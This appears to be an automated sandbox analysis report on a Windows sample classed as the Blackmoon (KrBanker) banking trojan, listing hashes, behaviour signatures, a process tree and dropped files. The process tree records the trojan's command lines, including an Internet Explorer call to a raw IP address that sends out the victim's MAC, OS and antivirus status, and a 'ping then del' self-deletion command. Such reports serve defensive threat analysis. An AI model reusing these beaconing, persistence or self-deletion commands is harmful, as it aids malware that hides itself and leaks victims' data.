Overview

overview

10

Static

static

3

JaffaCakes...68.exe

windows10-2004-x64

10

JaffaCakes...68.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    106s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/04/2025, 18:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe

  • Size

    34KB

  • MD5

    ca5b08f9fd5693eb4126738d68d6ac68

  • SHA1

    a81e3488ad3cbb3232cfeada9cb8f5fafcd62078

  • SHA256

    33a238742a161d7c292f77a097a9992c912bfd547b60963df9312bd827937d46

  • SHA512

    09e2b7941651a39fbede3fada199df5a0a12b973ec84aa3c8f0fa97de36194ac893dc8c1579ab64fb5d694f0cd3cf628e3f6109f41318c83c68a21225f66ce17

  • SSDEEP

    768:Sxa4PfkczEClQF0QGqwq0E6Na8WFaDrTCMNR8Gx8IPE7BNKSzHctMli:bQftW0QGq/aabWrTsGx3P6Cbtr

Score
10/10
blackmoonbankerdiscoverypersistencetrojan

Malware Config

Signatures

  • Blackmoon family
    blackmoon
  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

    trojanbankerblackmoon
  • Detect Blackmoon payload 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 27 IoCs
    adwarespyware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3824
    • C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://174.139.72.117/ad/get.asp?mac=FD263A7D6E8D83F384585DDA2CAF7945&os=Windows 8&avs=unknow&ps=NO.&ver=jack
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1584 CREDAT:17410 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2024
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 3
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:5136
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\system32\YouPin.exe
    1⤵
      PID:2380

    Network

    MITRE ATT&CK Enterprise v16

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
      Filesize

      471B

      MD5

      bdb6adbbf5fbeb7019e93fa040cf7b33

      SHA1

      0a9acc84dbd080bd78303cddd317bb08d9e33f92

      SHA256

      b4f324b9ae951c3ca006ddad99989d67fa8ca85003e05875c3fc877c512ca81f

      SHA512

      3ccb661af3171a6a1cb63bfcd6b9b5a76e02735285a42c82c2de58bd2c68fed45fe1238ef552371d46e584fb2ce500f1efd31baef6d979244b53c80f7009d740

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
      Filesize

      412B

      MD5

      85268d817ab527e415ab6d839de04f78

      SHA1

      dee9de8afb9f14b711f11d7208d11d200f2f160b

      SHA256

      0db5205c97d51b725f59e1f0862519edd12622d64b1724b384b14089936ef9c6

      SHA512

      a73fc1408cc2d8ea5e73a8b2b4de03312a52b0b2983d96277c5211fe949937099a05583401ada33a399f1a8eb24099e19eb06704fadf4338e93c5b0fbf9f0220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZDUDUCB4\suggestions[1].en-US
      Filesize

      17KB

      MD5

      5a34cb996293fde2cb7a4ac89587393a

      SHA1

      3c96c993500690d1a77873cd62bc639b3a10653f

      SHA256

      c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

      SHA512

      e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

      Download Submit

    • memory/3824-0-0x0000000000400000-0x0000000000431200-memory.dmp

      Filesize

      196KB

      Download

    • memory/3824-3-0x0000000000400000-0x0000000000431200-memory.dmp

      Filesize

      196KB

      Download